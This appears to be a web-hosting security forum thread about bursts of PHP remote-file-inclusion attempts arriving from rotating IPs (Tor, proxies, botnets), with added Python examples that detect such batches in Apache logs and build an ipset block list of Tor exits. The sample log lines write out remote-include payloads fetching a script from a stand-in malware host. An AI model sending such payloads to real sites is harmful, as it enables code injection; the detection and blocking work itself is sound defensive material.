Better understanding attacks
I keep a very close eye on our logs.
For some time now I've noticed that sometimes attacks come in small batches, where I'll see between 4 and 8 PHP injection attempts on the same domain using the same attack type and trying to load the same script from the same known malware site, each spaced a few seconds or sometimes a minute or two apart.
What I find interesting is that the IPs for the attacks are different. Sometimes totally different countries.
On the assumption that the same Skiddie is actually behind all the attempts, what might they be doing? Might they be using a set of different compromised servers? Or Tor? Or something else?
Is there a tool that allows them to automate this IP skipping in some way, or are such batch attacks a sign of someone with a little more sophistication than usual?
Very occasionally I'll see different attacks being used per IP, yet still spaced very closely and using the same malware site as the source of the script they are attempting to inject.
Faris.
--------------------------------
<advert>
If you want to rent a UK-based VPS that comes with friendly advice and support from a fellow ART fan, please get in touch.
</advert>
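The pattern Faris describes (several requests in a short window, different source IPs, same target domain, same remote payload URL) can be pulled out of a web server log mechanically rather than by eye. The following is an added example, not code from the original post or from Atomicorp: it parses constructed Apache log lines in the vhost_combined format (vhost first, then the usual combined fields), extracts the remote URL from PHP remote-include style requests such as `?page=http://...`, groups events by (vhost, payload URL), and reports any group where at least `min_ips` distinct addresses hit within `window`. The hostnames, addresses and URLs in the sample are invented.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not from the original post): Apache "vhost_combined" lines,
# i.e. "%v:%p" followed by the standard combined log format. Four requests from four
# different IPs pull the same remote script within about three minutes; one normal
# request and one unrelated payload are included as negatives.
SAMPLE_LOG = """\
www.example.com:80 203.0.113.10 - - [12/Mar/2010:10:15:01 +0000] "GET /index.php?page=http://malware.example/id.txt? HTTP/1.1" 403 221 "-" "Mozilla/4.0"
www.example.com:80 198.51.100.77 - - [12/Mar/2010:10:15:08 +0000] "GET /index.php?page=http://malware.example/id.txt? HTTP/1.1" 403 221 "-" "Mozilla/4.0"
www.example.com:80 192.0.2.55 - - [12/Mar/2010:10:16:40 +0000] "GET /index.php?page=http://malware.example/id.txt? HTTP/1.1" 403 221 "-" "Mozilla/4.0"
www.example.com:80 203.0.113.99 - - [12/Mar/2010:10:17:30 +0000] "GET /index.php?page=http://malware.example/id.txt? HTTP/1.1" 403 221 "-" "Mozilla/4.0"
www.example.com:80 198.51.100.2 - - [12/Mar/2010:10:40:00 +0000] "GET /about.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
www.example.com:80 192.0.2.8 - - [12/Mar/2010:14:02:00 +0000] "GET /index.php?page=http://other.example/x.txt? HTTP/1.1" 403 221 "-" "Mozilla/4.0"
"""

# vhost, client IP, timestamp, request line and status from a vhost_combined entry.
LINE_RE = re.compile(
    r'^(?P<vhost>\S+) (?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# A query parameter whose value is an absolute http(s) URL: the remote-include payload.
PAYLOAD_RE = re.compile(r'[?&]\w+=(https?://[^&\s"]+)', re.IGNORECASE)


def parse_events(log_text):
    """Return (timestamp, vhost, ip, payload_url) for every remote-include attempt."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        p = PAYLOAD_RE.search(m.group("path"))
        if not p:
            continue  # ordinary request, not an injection attempt
        ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
        # Strip the trailing "?" attackers append to neutralise the rest of the include path.
        events.append((ts, m.group("vhost"), m.group("ip"), p.group(1).rstrip("?")))
    return events


def find_batches(log_text, window=timedelta(minutes=5), min_ips=3):
    """Group attempts by (vhost, payload URL) and flag windows with >= min_ips distinct sources."""
    by_key = defaultdict(list)
    for ts, vhost, ip, payload in parse_events(log_text):
        by_key[(vhost, payload)].append((ts, ip))

    batches = []
    for (vhost, payload), evs in by_key.items():
        evs.sort()
        i = 0
        while i < len(evs):
            # Extend the window forward from event i as far as `window` allows.
            j = i
            while j + 1 < len(evs) and evs[j + 1][0] - evs[i][0] <= window:
                j += 1
            ips = sorted({ip for _, ip in evs[i:j + 1]})
            if len(ips) >= min_ips:
                batches.append({"vhost": vhost, "payload": payload,
                                "start": evs[i][0], "end": evs[j][0], "ips": ips})
                i = j + 1  # do not report overlapping sub-windows of the same batch
            else:
                i += 1
    return batches


if __name__ == "__main__":
    for b in find_batches(SAMPLE_LOG):
        span = (b["end"] - b["start"]).total_seconds()
        print(f'{b["vhost"]} <- {b["payload"]}: {len(b["ips"])} IPs in {span:.0f}s: {", ".join(b["ips"])}')
```

Tuning `window` and `min_ips` is the whole game: too small a window misses the "minute or two apart" spacing, too large one merges unrelated scans that happen to reuse a popular payload host. Keying on the payload URL rather than the attacking IP is what makes the distributed pattern visible at all.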
-
- Atomicorp Staff - Site Admin
- Posts: 8355
- Joined: Wed Dec 31, 1969 8:00 pm
- Location: earth
- Contact:
Re: Better understanding attacks
Tor gets used a lot, or they'll cycle through lists of open proxies. It could also be an attack via a botnet.
Re: Better understanding attacks
Interesting. OK, so we are back to needing an RBL (or IP list to add to a firewall) with Tor nodes in it.
I'll look into this a bit more.
Faris.
--------------------------------
-
- Atomicorp Staff - Site Admin
- Posts: 8355
- Joined: Wed Dec 31, 1969 8:00 pm
- Location: earth
- Contact:
Re: Better understanding attacks
Yeah, we have one for Tor, open proxies, etc. that we're using internally. It will probably show up in ASL in the near future.
Re: Better understanding attacks
If it is an IP list, would you care to share before then? Obviously tor exit nodes change quite frequently, but the core ones stay the same so even an out of date list would be useful.
Faris.
--------------------------------
- mikeshinn
- Atomicorp Staff - Site Admin
- Posts: 4155
- Joined: Thu Feb 07, 2008 7:49 pm
- Location: Chantilly, VA
Re: Better understanding attacks
I'm working on the Tor add-on now. The IP list is *huge*, so I'll see what I can do about packaging it as an unsupported list, no promises though - it's big. I'd prefer to get the auto-tor-rbl done sooner than later. Your box will basically generate the list in real time by asking the Tor directory nodes themselves, so there will be nothing for us to maintain or an RBL to query - you'll ask your own system.
Michael Shinn
Atomicorp - Security For Everyone
Re: Better understanding attacks
OK, sounds good -- I think if the list is huge we should wait until it is an integrated feature.
I'm a little alarmed by how long the firewall takes to load with the current block list (most of south america, plus some well known bad countries) that I have in place as it is. I'm really quite surprised at how slow it is, in fact.
... But that's another story
Faris.
--------------------------------
-
- Atomicorp Staff - Site Admin
- Posts: 8355
- Joined: Wed Dec 31, 1969 8:00 pm
- Location: earth
- Contact:
Re: Better understanding attacks
There are two different ways to do it. The way it's done right now is to make it easier to integrate with other firewall systems. There's a tradeoff there: the faster method is going to completely break integration with anything other than the native redhat/centos/fedora iptables script.
Re: Better understanding attacks
Hmmm.....
Well, I would have thought a huge percentage of people use APF or similar, me included.
Time to get ASF (Atomic Secured Firewall) off the backburner maybe?
Faris.
--------------------------------
- mikeshinn
- Atomicorp Staff - Site Admin
- Posts: 4155
- Joined: Thu Feb 07, 2008 7:49 pm
- Location: Chantilly, VA
Re: Better understanding attacks
> Time to get ASF (Atomic Secured Firewall) off the backburner maybe?

Heh, yeah, because the iptables route is actually not the most efficient means of doing this in Linux, there is a Better Way (TM) which means we gotta roll our own.
Michael Shinn
Atomicorp - Security For Everyone
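Two technical points in this thread are worth a concrete illustration: Mike's plan to build the Tor list locally from the directory data instead of a maintained RBL, and Faris's complaint that a large block list makes the firewall slow to load. The script below is an added example, not Atomicorp's code and not the "auto-tor-rbl" feature mentioned above. It parses a constructed excerpt in the format of a Tor network-status consensus (the "r" line carries the relay's address, "s" its flags, "p" its exit-policy summary; the relay names, fingerprints and addresses are invented), keeps the relays that can exit to the ports you care about, and emits input for `ipset restore`. Putting the addresses in a `hash:ip` set means the firewall needs one `iptables` rule that does a hash lookup, rather than one linearly-evaluated rule per address, and the temporary-set-plus-`swap` pattern lets the list be refreshed without a window where the set is empty.

```python
import ipaddress

# Constructed consensus excerpt (not real relays). Format per relay:
#   r <nick> <identity> <digest> <date> <time> <IP> <ORPort> <DirPort>
#   s <flags...>
#   w Bandwidth=<n>
#   p accept|reject <port-list>      (exit policy summary)
# A real consensus is fetched from a directory authority or mirror; a Tor client
# keeps its copy as "cached-consensus" in its data directory.
SAMPLE_CONSENSUS = """\
r exitrelayA AAAAAAAAAAAAAAAAAAAAAAAAAAA BBBBBBBBBBBBBBBBBBBBBBBBBBB 2010-03-12 09:00:00 198.51.100.20 9001 9030
s Exit Fast Running Stable V2Dir Valid
w Bandwidth=5000
p accept 80,443
r guardonly CCCCCCCCCCCCCCCCCCCCCCCCCCC DDDDDDDDDDDDDDDDDDDDDDDDDDD 2010-03-12 09:00:00 203.0.113.5 443 0
s Fast Guard Running Stable Valid
w Bandwidth=9000
p reject 1-65535
r badexit EEEEEEEEEEEEEEEEEEEEEEEEEEE FFFFFFFFFFFFFFFFFFFFFFFFFFF 2010-03-12 09:00:00 192.0.2.77 9001 0
s BadExit Exit Fast Running Valid
w Bandwidth=100
p accept 80
r exitrelayB GGGGGGGGGGGGGGGGGGGGGGGGGGG HHHHHHHHHHHHHHHHHHHHHHHHHHH 2010-03-12 09:00:00 198.51.100.21 9001 0
s Exit Fast Running Valid
w Bandwidth=3000
p accept 1-65535
r mailexit IIIIIIIIIIIIIIIIIIIIIIIIIII JJJJJJJJJJJJJJJJJJJJJJJJJJJ 2010-03-12 09:00:00 198.51.100.22 9001 0
s Fast Running Valid
w Bandwidth=800
p accept 25,465
"""


def parse_relays(consensus_text):
    """Return one dict per relay: nick, addr, flags and (kind, port_ranges) policy summary."""
    relays, cur = [], None
    for line in consensus_text.splitlines():
        parts = line.split()
        if not parts:
            continue
        if parts[0] == "r" and len(parts) >= 9:
            # Default to "reject everything" until a "p" line says otherwise.
            cur = {"nick": parts[1], "addr": parts[6], "flags": set(),
                   "policy": ("reject", [(1, 65535)])}
            relays.append(cur)
        elif cur is None:
            continue
        elif parts[0] == "s":
            cur["flags"] = set(parts[1:])
        elif parts[0] == "p" and len(parts) == 3:
            ranges = []
            for item in parts[2].split(","):
                lo, _, hi = item.partition("-")
                ranges.append((int(lo), int(hi or lo)))
            cur["policy"] = (parts[1], ranges)
    return relays


def policy_allows(policy, port):
    """Evaluate an accept/reject port-list summary for a single port."""
    kind, ranges = policy
    listed = any(lo <= port <= hi for lo, hi in ranges)
    return listed if kind == "accept" else not listed


def exit_addresses(consensus_text, ports=(80, 443), include_badexit=False):
    """Addresses of running relays whose policy lets them exit to any of `ports`."""
    out = set()
    for r in parse_relays(consensus_text):
        if "Running" not in r["flags"]:
            continue
        if "BadExit" in r["flags"] and not include_badexit:
            continue  # flagged by the directory authorities as misbehaving; usually still worth blocking
        if any(policy_allows(r["policy"], p) for p in ports):
            out.add(r["addr"])
    return sorted(out, key=ipaddress.ip_address)


def ipset_restore_script(addrs, setname="tor_exits"):
    """Build `ipset restore` input that atomically replaces the live set via swap."""
    tmp = setname + "_tmp"
    opts = "hash:ip family inet hashsize 4096 maxelem 65536"
    lines = [f"create {setname} {opts} -exist",   # no-op if the live set already exists
             f"create {tmp} {opts}"]
    lines += [f"add {tmp} {a}" for a in addrs]
    lines += [f"swap {tmp} {setname}", f"destroy {tmp}"]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    # Pipe this into `ipset restore`; then a single rule covers the whole list, e.g.
    # iptables -I INPUT -p tcp -m multiport --dports 80,443 -m set --match-set tor_exits src -j DROP
    print(ipset_restore_script(exit_addresses(SAMPLE_CONSENSUS)), end="")
```

Two caveats before relying on this. A relay's OR address in the consensus is not always the address its exit traffic leaves from; the Tor Project's own exit list (https://check.torproject.org/torbulkexitlist) is built by scanning exits and is the more reliable source for blocking. And as the earlier reply notes, Tor is only one of three possibilities here; open proxies and botnet hosts need their own lists, and blocking Tor also blocks its legitimate users.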